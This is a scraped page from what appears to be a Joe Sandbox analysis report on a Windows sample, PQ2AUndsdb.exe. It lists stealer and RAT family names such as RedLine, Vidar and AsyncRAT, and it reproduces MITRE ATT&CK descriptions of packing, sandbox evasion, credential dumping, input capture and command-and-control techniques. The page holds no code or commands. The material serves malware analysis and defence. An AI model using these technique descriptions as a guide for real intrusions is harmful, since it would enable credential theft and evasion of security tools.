Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PQ2AUndsdb.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Vidar

Threatname: SmokeLoader

Threatname: VenomRAT

Threatname: Amadey

Threatname: AsyncRAT

Threatname: Cryptbot

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Windows Analysis Report
PQ2AUndsdb.exe

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre